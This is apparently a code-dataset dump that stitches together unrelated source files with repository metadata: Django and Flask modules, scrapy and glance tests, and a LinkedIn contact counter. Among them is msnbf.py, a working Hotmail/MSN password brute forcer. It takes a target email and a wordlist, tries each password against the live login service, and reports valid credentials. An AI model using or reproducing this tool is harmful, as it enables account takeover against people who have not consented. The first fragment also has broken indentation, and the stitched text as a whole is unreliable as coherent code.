# _args.setdefault('date', {})['$lte'] = to_date
# _args = super(HourlyStatsSerializer, self).make_filter(_args)
# return _args
def find(self, spec, skip=0, limit=settings.PAGE_SIZE, sort=None):
_args = spec.copy()
from_date = _args.pop('from_date', None)
        if not from_date:
            from_date = datetime.now() - timedelta(hours=24)
        else:
            from_date = dateutil.parser.parse(from_date, ignoretz=True)
to_date = _args.pop('to_date', None)
_args = self.make_filter(_args)
_args.setdefault('date', {})['$gte'] = from_date
if not to_date:
to_date = from_date + timedelta(hours=999)
else:
to_date = dateutil.parser.parse(to_date, ignoretz=True)
_args.setdefault('date', {})['$lte'] = to_date
response = {
'items': compute_hourly_stats(_args, from_date, to_date)
}
return response
| agpl-3.0 | 2,927,350,094,673,577,500 | 36.217532 | 125 | 0.567914 | false |
peterorum/data-hmm | linkedin/by-company.py | 1 | 1337 | #!/usr/bin/python
import os
import csv
from collections import Counter
from operator import itemgetter
from prettytable import PrettyTable
# XXX: Place your "Outlook CSV" formatted file of connections from
# http://www.linkedin.com/people/export-settings at the following
# location: private/linkedin-connections.csv
CSV_FILE = os.path.join("private", 'linkedin-connections.csv')
# Define a set of transforms that converts the first item
# to the second item. Here, we're simply handling some
# commonly known abbreviations, stripping off common suffixes,
# etc.
transforms = [(', Inc.', ''), (', Inc', ''), (', LLC', ''), (', LLP', ''),
(' LLC', ''), (' Inc.', ''), (' Inc', ''), (' AU', ''), (' Australia', ''),
(' Pty Ltd', ''), (' Ltd', '')]
csvReader = csv.DictReader(open(CSV_FILE), delimiter=',', quotechar='"')
contacts = [row for row in csvReader]
companies = [c['Company'].strip() for c in contacts if c['Company'].strip() != '']
for i, _ in enumerate(companies):
for transform in transforms:
companies[i] = companies[i].replace(*transform)
pt = PrettyTable(field_names=['Company', 'Freq'])
pt.align = 'l'
c = Counter(companies)
[pt.add_row([company, freq])
for (company, freq) in sorted(c.items(), key=itemgetter(1), reverse=True)
if freq > 1]
print pt | mit | -3,733,075,963,262,727,700 | 29.409091 | 91 | 0.646223 | false |
leleobhz/scripts | python/others_utilities/msnbf.py | 1 | 3708 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Hotmail brute forcer
# programmer : gunslinger_
# Inspired by mywisdom
# This program is only for educational purposes only.
import sys, time, msnp
__Author__ = "Gunslinger_ - Modified by Leleobhz"
__Version__ = "1.0"
__Date__ = "Mon, 22 Feb 2010 13:13:43 +0700 "
log = "msnbrute.log"
file = open(log, "a")
counter = 0
face = '''
MSN brute forcer
programmer : %s
version : %s
date release : %s
''' % (__Author__, __Version__, __Date__)
help = '''
Usage : ./msnbf.py -u [email] -w [wordlist]
Example : ./msnbf.py -u [email protected] -w wordlist.txt
'''
for arg in sys.argv:
if arg.lower() == '-u' or arg.lower() == '--user':
email = sys.argv[int(sys.argv.index(arg))+1]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
print face
print help
file.write(face)
file.write(help)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)
def definer():
print "-" * 60
print "[+] Email : %s" % email
print "[+] Wordlist : %s" % wordlist
print "[+] Length wordlist : %s " % len(words)
print "[+] Time Starting : %s" % time.strftime("%X")
print "-" * 60
file.write ("\n[+] Email : %s" % email)
file.write ("\n[+] Wordlist : %s" % wordlist)
file.write ("\n[+] length wordlist : %s " % len(words))
file.write ("\n[+] Time Starting : %s" % time.strftime("%X"))
class msnnologin(Exception):
def __init__(self, output):
self.output = output
def __str__(self):
return repr(self.output)
def msnparse():
def state_changed(self, state):
if state == "New state: NLN":
return 0
else:
raise msnnologin(state)
def main(password):
global counter
sys.stdout.write ("[-] Trying : %s \n" % (password))
sys.stdout.flush()
file.write("[-] Trying : %s \n" % (str(password)))
try:
msntmp = msnp.Session(msnparse())
msntmp.login(email, password)
print "[+] W00t w00t !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Valid!" % (email, password)
file.write("[+] W00t w00t !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Valid!" % (email, password))
sys.exit(1)
except msnp.error.HttpError:
exit
except msnnologin:
exit
except KeyboardInterrupt:
print "\n[-] Aborting...\n"
file.write("\n[-] Aborting...\n")
sys.exit(1)
counter+=1
if counter == len(words)/5:
print "[+] Hotmailbruteforcer 20% way done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on 1/4 way done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words)/4:
print "[+] Hotmailbruteforcer 25% way done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on 1/4 way done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words)/2:
print "[+] Hotmailbruteforcer on 50% done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on halfway done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words):
print "[+] Hotmailbruteforcer done...\n"
file.write("[+] Hotmailbruteforcer done...!\n")
msntmp.logout()
if __name__ == '__main__':
print face
file.write(face)
definer()
for password in words:
main(password.replace("\n",""))
main(password)
| gpl-2.0 | -3,270,820,469,121,388,000 | 29.393443 | 118 | 0.591963 | false |
mliu7/jingo | jingo/__init__.py | 1 | 8300 | """Adapter for using Jinja2 with Django."""
import functools
import imp
import logging
import re
from django.conf import settings
from django.template.base import Origin, TemplateDoesNotExist
from django.template.context import get_standard_processors
from django.template.loader import BaseLoader
from django.utils._os import safe_join  # needed by Loader.get_template_sources
from django.utils.importlib import import_module
import jinja2
VERSION = (0, 6, 1)
__version__ = '.'.join(map(str, VERSION))
EXCLUDE_APPS = (
'admin',
'admindocs',
'registration',
'context_processors',
)
log = logging.getLogger('jingo')
_helpers_loaded = False
class Environment(jinja2.Environment):
def get_template(self, name, parent=None, globals=None):
"""Make sure our helpers get loaded before any templates."""
load_helpers()
return super(Environment, self).get_template(name, parent, globals)
def from_string(self, source, globals=None, template_class=None):
load_helpers()
return super(Environment, self).from_string(source, globals,
template_class)
def get_env():
"""Configure and return a jinja2 Environment."""
# Mimic Django's setup by loading templates from directories in
# TEMPLATE_DIRS and packages in INSTALLED_APPS.
x = ((jinja2.FileSystemLoader, settings.TEMPLATE_DIRS),
(jinja2.PackageLoader, settings.INSTALLED_APPS))
loaders = [loader(p) for loader, places in x for p in places]
opts = {'trim_blocks': True,
'extensions': ['jinja2.ext.i18n'],
'autoescape': True,
'auto_reload': settings.DEBUG,
'loader': jinja2.ChoiceLoader(loaders),
}
if hasattr(settings, 'JINJA_CONFIG'):
if hasattr(settings.JINJA_CONFIG, '__call__'):
config = settings.JINJA_CONFIG()
else:
config = settings.JINJA_CONFIG
opts.update(config)
e = Environment(**opts)
# Install null translations since gettext isn't always loaded up during
# testing.
if ('jinja2.ext.i18n' in e.extensions or
'jinja2.ext.InternationalizationExtension' in e.extensions):
e.install_null_translations()
return e
def render_to_string(request, template, context=None):
"""
Render a template into a string.
"""
def get_context():
c = {} if context is None else context.copy()
for processor in get_standard_processors():
c.update(processor(request))
return c
# If it's not a Template, it must be a path to be loaded.
if not isinstance(template, jinja2.environment.Template):
template = env.get_template(template)
return template.render(get_context())
def load_helpers():
"""Try to import ``helpers.py`` from each app in INSTALLED_APPS."""
# We want to wait as long as possible to load helpers so there aren't any
# weird circular imports with jingo.
global _helpers_loaded
if _helpers_loaded:
return
_helpers_loaded = True
from jingo import helpers # noqa
for app in settings.INSTALLED_APPS:
try:
app_path = import_module(app).__path__
except AttributeError:
continue
try:
imp.find_module('helpers', app_path)
except ImportError:
continue
import_module('%s.helpers' % app)
class Register(object):
"""Decorators to add filters and functions to the template Environment."""
def __init__(self, env):
self.env = env
def filter(self, f=None, override=True):
"""Adds the decorated function to Jinja's filter library."""
def decorator(f):
@functools.wraps(f)
def wrapper(*args, **kw):
return f(*args, **kw)
return self.filter(wrapper, override)
if not f:
return decorator
if override or f.__name__ not in self.env.filters:
self.env.filters[f.__name__] = f
return f
def function(self, f=None, override=True):
"""Adds the decorated function to Jinja's global namespace."""
def decorator(f):
@functools.wraps(f)
def wrapper(*args, **kw):
return f(*args, **kw)
return self.function(wrapper, override)
if not f:
return decorator
if override or f.__name__ not in self.env.globals:
self.env.globals[f.__name__] = f
return f
def inclusion_tag(self, template):
"""Adds a function to Jinja, but like Django's @inclusion_tag."""
def decorator(f):
@functools.wraps(f)
def wrapper(*args, **kw):
context = f(*args, **kw)
t = env.get_template(template).render(context)
return jinja2.Markup(t)
return self.function(wrapper)
return decorator
env = get_env()
register = Register(env)
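# Hypothetical usage sketch (not part of jingo itself): the decorators above
# are meant to be used from an app's helpers.py, which load_helpers() imports
# for every app in INSTALLED_APPS. The helper names below are made up; calling
# this function registers them into the shared environment.
def _example_register_helpers():
    @register.filter
    def shout(text):
        return text.upper()
    @register.function
    def greet(name):
        return 'Hello, %s!' % name
    return shout, greet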
class Template(jinja2.Template):
def render(self, context={}):
"""Render's a template, context can be a Django Context or a
dictionary.
"""
# flatten the Django Context into a single dictionary.
context_dict = {}
if hasattr(context, 'dicts'):
for d in context.dicts:
context_dict.update(d)
else:
context_dict = context
# Django Debug Toolbar needs a RequestContext-like object in order
# to inspect context.
class FakeRequestContext:
dicts = [context]
context = FakeRequestContext()
# Used by debug_toolbar.
if settings.TEMPLATE_DEBUG:
from django.test import signals
self.origin = Origin(self.filename)
signals.template_rendered.send(sender=self, template=self,
context=context)
return super(Template, self).render(context_dict)
class Loader(BaseLoader):
is_usable = True
env.template_class = Template
def __init__(self):
super(Loader, self).__init__()
include_pattern = getattr(settings, 'JINGO_INCLUDE_PATTERN', None)
if include_pattern:
self.include_re = re.compile(include_pattern)
else:
self.include_re = None
def _valid_template(self, template_name):
if self.include_re:
if not self.include_re.search(template_name):
return False
if hasattr(template_name, 'split'):
app = template_name.split('/')[0]
if app in getattr(settings, 'JINGO_EXCLUDE_APPS', EXCLUDE_APPS):
return False
return True
def get_template_sources(self, template_name, template_dirs=None):
"""
Returns the absolute paths to "template_name", when appended to each
directory in "template_dirs". Any paths that don't lie inside one of the
template dirs are excluded from the result set, for security reasons.
"""
if not template_dirs:
template_dirs = []
for template_dir in template_dirs:
try:
yield safe_join(template_dir, template_name)
except UnicodeDecodeError:
# The template dir name was a bytestring that wasn't valid UTF-8.
raise
except ValueError:
# The joined path was located outside of template_dir.
pass
def load_template(self, template_name, template_dirs=None):
if not self._valid_template(template_name):
raise TemplateDoesNotExist(template_name)
try:
template = env.get_template(template_name)
return template, template.filename
except jinja2.TemplateNotFound:
raise TemplateDoesNotExist(template_name)
def load_template_source(self, template_name, template_dirs=None):
if not self._valid_template(template_name):
raise TemplateDoesNotExist(template_name)
try:
template = env.get_template(template_name)
except jinja2.TemplateNotFound:
raise TemplateDoesNotExist(template_name)
with open(template.filename, 'rb') as fp:
return (fp.read().decode(settings.FILE_CHARSET), template.filename)
| bsd-3-clause | 9,181,463,428,604,043,000 | 31.29572 | 81 | 0.604699 | false |
kottenator/django-compressor-toolkit | compressor_toolkit/filters.py | 1 | 3854 | import logging
import os
import re
from compressor.filters.css_default import CssAbsoluteFilter
from compressor.filters.datauri import CssDataUriFilter as BaseCssDataUriFilter
from django.apps import apps
from django.conf import settings
app_config = apps.get_app_config('compressor_toolkit')
logger = logging.getLogger(__file__)
class CssRelativeFilter(CssAbsoluteFilter):
"""
    Do URL processing similar to ``CssAbsoluteFilter``,
    but replace the ``settings.COMPRESS_URL`` prefix with '../' * (N + 1),
    where N is the *depth* of the ``settings.COMPRESS_OUTPUT_DIR`` folder.
E.g. by default ``settings.COMPRESS_OUTPUT_DIR == 'CACHE'``,
its depth N == 1, prefix == '../' * (1 + 1) == '../../'.
If ``settings.COMPRESS_OUTPUT_DIR == 'my/compiled/data'``,
its depth N == 3, prefix == '../' * (3 + 1) == '../../../../'.
How does it work:
- original file URL: '/static/my-app/style.css'
- it has an image link: ``url(images/logo.svg)``
- compiled file URL: '/static/CACHE/css/abcdef123456.css'
- replaced image link URL: ``url(../../my-app/images/logo.svg)``
"""
def add_suffix(self, url):
url = super(CssRelativeFilter, self).add_suffix(url)
old_prefix = self.url
if self.has_scheme:
old_prefix = '{}{}'.format(self.protocol, old_prefix)
# One level up from 'css' / 'js' folder
new_prefix = '..'
# N levels up from ``settings.COMPRESS_OUTPUT_DIR``
new_prefix += '/..' * len(list(filter(
None, os.path.normpath(settings.COMPRESS_OUTPUT_DIR).split(os.sep)
)))
return re.sub('^{}'.format(old_prefix), new_prefix, url)
class CssDataUriFilter(BaseCssDataUriFilter):
"""
Override default ``compressor.filters.datauri.CssDataUriFilter``:
- fix https://github.com/django-compressor/django-compressor/issues/776
- introduce new settings - ``COMPRESS_DATA_URI_INCLUDE_PATHS`` and
``COMPRESS_DATA_URI_EXCLUDE_PATHS`` - to filter only specific file paths or extensions,
e.g. ``settings.COMPRESS_DATA_URI_INCLUDE_PATHS = '\.svg$'``.
"""
def input(self, filename=None, **kwargs):
if not filename:
return self.content
# Store filename - we'll use it to build file paths
self.filename = filename
output = self.content
for url_pattern in self.url_patterns:
output = url_pattern.sub(self.data_uri_converter, output)
return output
def data_uri_converter(self, matchobj):
url = matchobj.group(1).strip(' \'"')
# Don't process URLs that start with: 'data:', 'http://', 'https://' and '/'.
# We're interested only in relative URLs like 'images/icon.png' or '../images/icon.svg'
if not re.match('^(data:|https?://|/)', url):
file_path = self.get_file_path(url)
# Include specific file paths (optional)
file_path_included = bool(
not hasattr(settings, 'COMPRESS_DATA_URI_INCLUDE_PATHS') or
re.match(settings.COMPRESS_DATA_URI_INCLUDE_PATHS, file_path)
)
# Exclude specific file paths (optional)
file_path_excluded = bool(
hasattr(settings, 'COMPRESS_DATA_URI_EXCLUDE_PATHS') and
re.match(settings.COMPRESS_DATA_URI_EXCLUDE_PATHS, file_path)
)
if file_path_included and not file_path_excluded:
try:
return super(CssDataUriFilter, self).data_uri_converter(matchobj)
except OSError:
logger.warning('"{}" file not found'.format(file_path))
return 'url("{}")'.format(url)
def get_file_path(self, url):
file_path = re.sub('[#?].*$', '', url)
return os.path.abspath(os.path.join(os.path.dirname(self.filename), file_path))
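# Hypothetical configuration sketch (not part of this module): how these
# filters might be wired into a Django settings file. The setting names below
# come from django-compressor and from the docstrings above, but the exact
# values are assumptions.
#
# COMPRESS_CSS_FILTERS = [
#     'compressor_toolkit.filters.CssRelativeFilter',
#     'compressor_toolkit.filters.CssDataUriFilter',
# ]
# COMPRESS_DATA_URI_MAX_SIZE = 5 * 1024
# COMPRESS_DATA_URI_INCLUDE_PATHS = r'\.(svg|png)$'
# COMPRESS_DATA_URI_EXCLUDE_PATHS = r'.*/sprites/.*'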
| mit | 1,912,537,893,408,338,700 | 38.731959 | 95 | 0.608978 | false |
adam2392/smile | smile/accounts/migrations/0002_auto_20160313_1723.py | 1 | 1197 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.3 on 2016-03-13 17:23
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('admins', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.DeleteModel(
name='AvailableProject',
),
migrations.AddField(
model_name='userprofile',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='admins.AvailableProject'),
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| apache-2.0 | -3,652,358,345,451,040,300 | 30.5 | 114 | 0.60401 | false |
redhat-openstack/glance | glance/tests/test_hacking.py | 1 | 2724 | # Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from glance.hacking import checks
from glance.tests import utils
class HackingTestCase(utils.BaseTestCase):
def test_assert_true_instance(self):
self.assertEqual(1, len(list(checks.assert_true_instance(
"self.assertTrue(isinstance(e, "
"exception.BuildAbortException))"))))
self.assertEqual(
0, len(list(checks.assert_true_instance("self.assertTrue()"))))
def test_assert_equal_type(self):
self.assertEqual(1, len(list(checks.assert_equal_type(
"self.assertEqual(type(als['QuicAssist']), list)"))))
self.assertEqual(
0, len(list(checks.assert_equal_type("self.assertTrue()"))))
def test_assert_equal_none(self):
self.assertEqual(1, len(list(checks.assert_equal_none(
"self.assertEqual(A, None)"))))
self.assertEqual(1, len(list(checks.assert_equal_none(
"self.assertEqual(None, A)"))))
self.assertEqual(
0, len(list(checks.assert_equal_none("self.assertIsNone()"))))
def test_no_translate_debug_logs(self):
self.assertEqual(1, len(list(checks.no_translate_debug_logs(
"LOG.debug(_('foo'))", "glance/store/foo.py"))))
self.assertEqual(0, len(list(checks.no_translate_debug_logs(
"LOG.debug('foo')", "glance/store/foo.py"))))
self.assertEqual(0, len(list(checks.no_translate_debug_logs(
"LOG.info(_('foo'))", "glance/store/foo.py"))))
def test_no_direct_use_of_unicode_function(self):
self.assertEqual(1, len(list(checks.no_direct_use_of_unicode_function(
"unicode('the party dont start til the unicode walks in')"))))
self.assertEqual(1, len(list(checks.no_direct_use_of_unicode_function(
"""unicode('something '
'something else"""))))
self.assertEqual(0, len(list(checks.no_direct_use_of_unicode_function(
"six.text_type('party over')"))))
self.assertEqual(0, len(list(checks.no_direct_use_of_unicode_function(
"not_actually_unicode('something completely different')"))))
| apache-2.0 | -1,746,852,187,166,258,200 | 41.5625 | 78 | 0.646109 | false |
eLRuLL/scrapy | tests/test_cmdline/__init__.py | 1 | 2487 | import json
import os
import pstats
import shutil
import sys
import tempfile
import unittest
from io import StringIO
from subprocess import Popen, PIPE
from scrapy.utils.test import get_testenv
class CmdlineTest(unittest.TestCase):
def setUp(self):
self.env = get_testenv()
self.env['SCRAPY_SETTINGS_MODULE'] = 'tests.test_cmdline.settings'
def _execute(self, *new_args, **kwargs):
encoding = getattr(sys.stdout, 'encoding') or 'utf-8'
args = (sys.executable, '-m', 'scrapy.cmdline') + new_args
proc = Popen(args, stdout=PIPE, stderr=PIPE, env=self.env, **kwargs)
comm = proc.communicate()[0].strip()
return comm.decode(encoding)
def test_default_settings(self):
self.assertEqual(self._execute('settings', '--get', 'TEST1'), 'default')
def test_override_settings_using_set_arg(self):
self.assertEqual(self._execute('settings', '--get', 'TEST1', '-s',
'TEST1=override'), 'override')
def test_override_settings_using_envvar(self):
self.env['SCRAPY_TEST1'] = 'override'
self.assertEqual(self._execute('settings', '--get', 'TEST1'), 'override')
def test_profiling(self):
path = tempfile.mkdtemp()
filename = os.path.join(path, 'res.prof')
try:
self._execute('version', '--profile', filename)
self.assertTrue(os.path.exists(filename))
out = StringIO()
stats = pstats.Stats(filename, stream=out)
stats.print_stats()
out.seek(0)
stats = out.read()
self.assertIn(os.path.join('scrapy', 'commands', 'version.py'),
stats)
self.assertIn('tottime', stats)
finally:
shutil.rmtree(path)
def test_override_dict_settings(self):
EXT_PATH = "tests.test_cmdline.extensions.DummyExtension"
EXTENSIONS = {EXT_PATH: 200}
settingsstr = self._execute('settings', '--get', 'EXTENSIONS', '-s',
'EXTENSIONS=' + json.dumps(EXTENSIONS))
# XXX: There's gotta be a smarter way to do this...
self.assertNotIn("...", settingsstr)
for char in ("'", "<", ">", 'u"'):
settingsstr = settingsstr.replace(char, '"')
settingsdict = json.loads(settingsstr)
self.assertCountEqual(settingsdict.keys(), EXTENSIONS.keys())
self.assertEqual(200, settingsdict[EXT_PATH])
| bsd-3-clause | 4,136,940,395,105,546,000 | 36.681818 | 81 | 0.593084 | false |
dimitdim/GetARoom | Main/app/models.py | 1 | 13192 | __author__ = 'kflores'
"""
Model that defines the class structure of the database.
"""
from app import db
ROLE_USER = 0
ROLE_ADMIN = 1
class Node(db.Model):
"""class representation of one networked sensor kit hooked into ethernet. Instatiation requires the name, ip address, and location of the "node", but all of these values should be placed into the config file (see get_node_config(filename) in download_data.py)
"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
ip = db.Column(db.String)
loc = db.Column(db.String, index=True, unique=True)
data = db.relationship('Data', backref='origin', lazy='dynamic')
status = db.relationship('Status', backref='origin', lazy='dynamic')
def __init__(self, name, ip, loc):
self.name = name
self.ip = ip
self.loc = loc
def __repr__(self):
return '%s is at %s in %s' % (self.name, self.ip, self.loc)
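# Hypothetical sketch (not part of the original model file): creating and
# persisting one Node row. The name/IP/location values are made up; in the
# real project they come from the node config file mentioned above.
def _example_register_node():
    node = Node('node-1', '192.168.1.50', 'Library-3N')
    db.session.add(node)
    db.session.commit()
    return node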
class Data(db.Model):
"""
    Class representation of one data row in the data table. This object records the local time, node uptime, brightness, temperature, door IR sensor, and the time the door was last opened. Volume is a dummy variable for a feature that is not yet implemented. node_id ties each Data object to the Node object that created it (i.e. the location it was recorded at).
"""
id = db.Column(db.Integer, primary_key=True)
localtimestamp = db.Column(db.Integer)
uptime = db.Column(db.Integer)
brightness = db.Column(db.Integer)
temperature = db.Column(db.Integer)
volume = db.Column(db.Integer)
door = db.Column(db.Integer)
last_opened = db.Column(db.Integer)
node_id = db.Column(db.Integer, db.ForeignKey("node.id"))
def __init__(self, localtimestamp, uptime, brightness, temperature, volume, door, last_opened, origin):
self.localtimestamp = localtimestamp
self.uptime = uptime
self.brightness = brightness
self.temperature = temperature
self.volume = volume
self.door = door
self.last_opened = last_opened
self.origin = origin
def __repr__(self):
return "Light: %s, Temp: %s, Last: %s" % (self.brightness, self.temperature, self.last_opened)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
nickname = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
role = db.Column(db.SmallInteger, default=ROLE_USER)
temp = db.Column(db.String(4), default='f')
posts = db.relationship('Post', backref='author', lazy='dynamic')
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return unicode(self.id)
def __repr__(self):
return '<User %r>' % (self.nickname)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String(140))
timestamp = db.Column(db.DateTime)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Post %r>' % (self.body)
class Status(db.Model):
"""
    Object for storing room status values. An analysis routine that processes sensor data and reaches a conclusion on room state will instantiate these objects. WIP.
"""
id = db.Column(db.Integer, primary_key=True)
start = db.Column(db.Integer)
status = db.Column(db.Boolean)
node_id = db.Column(db.Integer, db.ForeignKey("node.id"))
def __init__(self, start, status, origin):
self.start = start
self.status = status
self.origin = origin
#=======================ittVBBBMMMWMMMMMMMMMMWWWWWWWWWWMMWWMMBRRRXYIi=================================================
#=======================iIXBRBMMMMWWWWWWMMMMMMWWWWMMMMMMMWWWWWMMMWRYt+================================================
#======================+YRBBMMMMMWWWWWWMMMMMMMMWWWWWWMMMWWWWWWMMMWWBVt================================================
#=====================+tRMBMMWWMWWWWWMMMMMMMMMMMWWWWWWWWWWWWWWWWMWMMBY================================================
#====================+tIRMWMWWWWMWWWWMMMMMMMMMMMWWWWWWWWWWMMWMWWMWWWMR================================================
#===================iYtVBWMMWWMWWWWWMMMMMMMMMMMMWWWWWWWWWWWMMMWWWWWWWMV+=;============================================
#==================+VXRBMWMMMMWWMMWWWWWMMMMMMMWMWWWWWWWWWWWWWWWWWWWWWBXY+=;===========================================
#=================;iXXMMMMWMWWWMBMMMWWMMWMMMMMMMMMWWWWWWWWWWWWWWWWWWWMVVi=;===========================================
#==================YBMBMWWWMWWMMMMMBMMMMBMBMMMMMMMMMWMMMMWWWWWWWMWWWWWMVi;=;==========================================
#=================tBMBMMWWMMMBMMWWWWMBMMMBBMMMMMMWMMMBBMMMWWWWWWWWWWWWWBY=;===========================================
#================+RMBBMMWWMWMBMWWWWWWWBBBRBMMMMMMWWMMBBBBMWWWWWWWWWWWWWWXi============================================
#================tMMMMMMWMWWMMWWWMMMWWMBRRRBXBMMWMMMMBBRRRBMWWWWWWWWWWWWBI+=;=========================================
#================IMMWMWMMWWWWWWWMBMMMWWMRXXXVRBBMBBMMBRXVVVRBWW#WWWMWWWWMRt==;;=======================================
#================VMMWMWWWWWWWWMMMMMMMBMBRVVVXRXBRBBBRRXVYYYVRBWWWWWWWWWWMMXY+;========================================
#===============tRMWWWWWWWWWWWWMMMMBRRRRXVYVVVVXXRRXVVYYIYYYVRMMWWWWWWWWWWBV==========================================
#===============YMMWWWWWWWWWWMMBBBBBBRXXVVVVYYVYXRXVYIIIIIYVVXRMWWWWWWWWWMBY==========================================
#============;=+XMMWWWWW##WWMRRRRRRRRXXVYYYYYYVVXXYIIIIIIYYVVVXBWWWWWWWWWWMI;;========================================
#============;IXBWMWWWWW#WWWBXVVVVVVYYYYIIttIYVVYIIIIIIIIYYVVVXBMWWWWWWWWWMY=;========================================
#============+XMMWWWWWWWWWWMRXVVYYYIIIItIIiitIIttttItIIIIYYVVVXRMMWWWWWWWMMY==========================================
#============tVMWWWWWWWWWWMBRXVYYYIIItttttiittiiittttIIIYYYYVVXRMMWWWWWWWMBI==;=======================================
#============iXWWWWW#WMW#WMRRXVYYYIIttttttiiiiiitiittIIIYYYYYVVRMWWWWWWWWMVt==========================================
#=============VWWWWWWWW##WMRXXVVYYIIttiiiii+iiitiittIIIIIIYYYYVXBWWWWWWWWBYi=;========================================
#=============VWWWWWMWW##WMRXXVVYYIIIIti++iiiiiiittttIIIIIIIYYVVXMWWWWWWMBYi;;========================================
#============+IBWMMMMW##WWBRXXVYYYIIIttii+iiiiiitttttttttIVVYYYYYBWWWWWMBBXi;;========================================
#============itXWWWWWWW##WMRXVVVYYYIIttiiiii++iiiiiiiIYVXBBRRXVYYRWWWMBWBRV=;;========================================
#============+IVBWW#WW###WMRXVVYYYIIIttiiiiiiiiiiiitYRBBMBXXXRXYYVMWMBRWWXi=;;========================================
#=============tIXMW#WWWW#WMRXVVYIIIIttiiiiiiiiiiiitYXRXXVYIIIYYYIYBMRXRWWX+;;;========================================
#=============+IYXBWWWWW#WBXVVVYYYYYYYItiiii++++iiIYVVYYItIItIIIIIXMBXRWMV+=;=========================================
#==============tYYRW#WWWWWBVVVVVRRBBBBRXYtii+++++iIYYIYYYIYIIIIIIIVBMXRWRI+=;=========================================
#==============iIYRWWWMWWWRVYVXBMMMMRRXXVtii+++++itIYVXVVXXXYYIIIIYRBXVRYi=;;=========================================
#===============tYXMWMBWWWRYYYRRXVVVVVVVYYti+++++iIYVXVRRYVRRVItIIIXBXYVIi=;;;;=======================================
#===============+IXMWRVMWWRYYYXVIIIIYYVVVYItiiiiitYVXYVMMI+YRYttIIIVBVIIIi=;;=========================================
#================iVMWRYBMWRYYYVYIIYYVVXXXVVYItiitYVVV+YBMViYXYIttIIYRYtIt+=;;=========================================
#=================YBMBIRMWRYYYYYYYXRRRMRYXXXVIiitYYYI+=XXtIVVYIttIIYRVtti;;;;=========================================
#===============++iRMMVVWMRYIYYYYXRRtBBBitVVVYtitYYYYYIttYVVYIttttIYXVtt+;============================================
#================+tVBMRYXBRYIIIYYXRYiRMBi+IVVYtitIYYYYYYVVYYItttttIYVYtti+++++++ii++++++==============================
#================+tIVXMYtRBYYIIIIYXVItVItYVYYYIttIIIIIIIIIIIttittIIYYVIti+iiiiiiiiiiiiii++++==========================
#=================itIYXYtVBYYIttIYVXXXYYVYIIYYItitIIttittttttiiitttIYVItiiiiiiiiiiiiiiiiiiiii+========================
#=================+tIIYYIYRVYIIttIIYVVVYYIttYYItitIIttii++i+iiiittIIYYiiiiiiiiiiiiiiiiiiiiiiii++======================
#==================+ttYIItXXYIItttttIYIItiiIYYItittItttii++++iitttIIVViiiiiittttttttttttttttiiii++====================
#====================tIIttYXYYIttiitttttiittYYItiitIIIIiiiiiiiittIIIVViiitttttttttttttttttttttttii++==================
#=====================iIttYXYYIItiiiiiii+iiIYIIt+itttIYYtiiiiiittIIYVViittttttttttttttttitttttttttii+=================
#=====================+tItIXVYIIttiii+++iitYIIIi++ititYYYIitttttIIYYXYtiiittttttttttttttttttttttttttii+===============
#==================;=;=tIttXVYIIIttii+++iiIYttIi++itttIIYYIIttIIIYYVXYttiittttttttttttttttttttttttttttii+=============
#====================;=iYVVRXYYIIttiiiiiitYYttItiitYYYIIIYVYIIIYYYYVXItttitttttttttttttttttttttttttttttti+============
#===================;;=itYVRXVYYIIttiiiiiIYYYYVYIIIYYYIIYYVVVYYYYYYVXItttittttttttttttttttttttttttttttttti+==+========
#====================;=itIVRRVVYIIItttttIYYYYYYYIIttIIIIYVVXVVYYYVVXXItttitttttttttttttttttttttttttttttttti+==========
#=====================+ttIYBRXVYYYIIItttIVYYYIItiiiitItIIYVVVVYYVYVRVIttttttttttttttttttttttttttttttttttttti+=========
#===================+iitttYBBXXVYYYIIIIIVVYYIIItiiiitYYYVVVVVYYYVYVRVItttttttttttttttttttttttttttttttttttttti+===+====
#=================+iiiitttYRBRXVVVYYYIYYXVVYIIIIItIIIItYXVXXVYYYYYXRYIttttttttttttttttttttttttttttttttttttttti+=======
